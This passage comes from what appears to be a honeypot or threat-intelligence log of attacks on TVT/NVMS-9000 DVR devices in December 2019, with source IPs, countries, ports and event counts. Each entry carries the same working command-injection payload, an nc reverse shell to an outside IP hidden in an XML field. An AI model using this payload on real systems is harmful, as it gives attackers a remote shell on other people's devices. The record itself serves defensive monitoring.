- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T14:18:44Z",
- "last_seen": "2019-12-22T14:18:44Z"
- },
- {
- "source_ip_address": "121.150.157.123",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T13:13:36Z",
- "last_seen": "2019-12-22T13:13:36Z"
- },
- {
- "source_ip_address": "211.220.118.57",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T13:07:18Z",
- "last_seen": "2019-12-22T13:07:18Z"
- },
- {
- "source_ip_address": "2.55.103.238",
- "country": "IL",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T13:02:29Z",
- "last_seen": "2019-12-22T13:02:29Z"
- },
- {
- "source_ip_address": "14.242.81.112",
- "country": "VN",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T12:54:22Z",
- "last_seen": "2019-12-22T12:54:22Z"
- },
- {
- "source_ip_address": "189.144.40.61",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T12:45:33Z",
- "last_seen": "2019-12-22T12:45:33Z"
- },
- {
- "source_ip_address": "124.111.117.196",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 71,
- "first_seen": "2019-12-22T12:15:47Z",
- "last_seen": "2019-12-22T12:15:47Z"
- },
- {
- "source_ip_address": "87.97.64.74",
- "country": "HU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T11:57:08Z",
- "last_seen": "2019-12-22T11:57:08Z"
- },
- {
- "source_ip_address": "187.206.186.19",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T11:35:15Z",
- "last_seen": "2019-12-22T11:35:15Z"
- },
- {
- "source_ip_address": "172.119.80.163",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T11:24:02Z",
- "last_seen": "2019-12-22T11:24:02Z"
- },
- {
- "source_ip_address": "188.226.93.106",
- "country": "RU",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T11:20:31Z",
- "last_seen": "2019-12-22T11:20:31Z"
- },
- {
- "source_ip_address": "189.183.200.105",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T11:07:08Z",
- "last_seen": "2019-12-22T11:07:08Z"
- },
- {
- "source_ip_address": "84.232.10.244",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T11:02:50Z",
- "last_seen": "2019-12-22T11:02:50Z"
- },
- {
- "source_ip_address": "111.253.106.18",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 79,
- "first_seen": "2019-12-22T10:59:20Z",
- "last_seen": "2019-12-22T10:59:20Z"
- },
- {
- "source_ip_address": "149.34.21.224",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-22T10:58:15Z",
- "last_seen": "2019-12-22T10:58:15Z"
- },
- {
- "source_ip_address": "114.35.190.194",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 7,
- "first_seen": "2019-12-22T10:57:19Z",
- "last_seen": "2019-12-22T10:57:19Z"
- },
- {
- "source_ip_address": "59.125.188.199",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T10:56:21Z",
- "last_seen": "2019-12-22T10:56:21Z"
- },
- {
- "source_ip_address": "14.46.131.73",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T10:53:18Z",
- "last_seen": "2019-12-22T10:53:18Z"
- },
- {
- "source_ip_address": "189.243.243.182",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 79,
- "first_seen": "2019-12-22T10:51:25Z",
- "last_seen": "2019-12-22T10:51:25Z"
- },
- {
- "source_ip_address": "89.121.251.234",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-22T10:22:09Z",
- "last_seen": "2019-12-22T10:22:09Z"
- },
- {
- "source_ip_address": "79.36.195.201",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-22T10:10:30Z",
- "last_seen": "2019-12-22T10:10:30Z"
- },
- {
- "source_ip_address": "187.214.236.179",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T10:09:34Z",
- "last_seen": "2019-12-22T10:09:34Z"
- },
- {
- "source_ip_address": "59.1.129.10",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T10:02:59Z",
- "last_seen": "2019-12-22T10:02:59Z"
- },
- {
- "source_ip_address": "47.206.1.10",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T10:02:15Z",
- "last_seen": "2019-12-22T10:02:15Z"
- },
- {
- "source_ip_address": "50.195.140.108",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 4,
- "first_seen": "2019-12-22T09:33:42Z",
- "last_seen": "2019-12-22T09:33:42Z"
- },
- {
- "source_ip_address": "51.37.250.63",
- "country": "IE",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-22T09:32:23Z",
- "last_seen": "2019-12-22T09:32:23Z"
- },
- {
- "source_ip_address": "220.135.199.85",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 5,
- "first_seen": "2019-12-22T09:22:07Z",
- "last_seen": "2019-12-22T09:22:07Z"
- },
- {
- "source_ip_address": "188.218.155.193",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
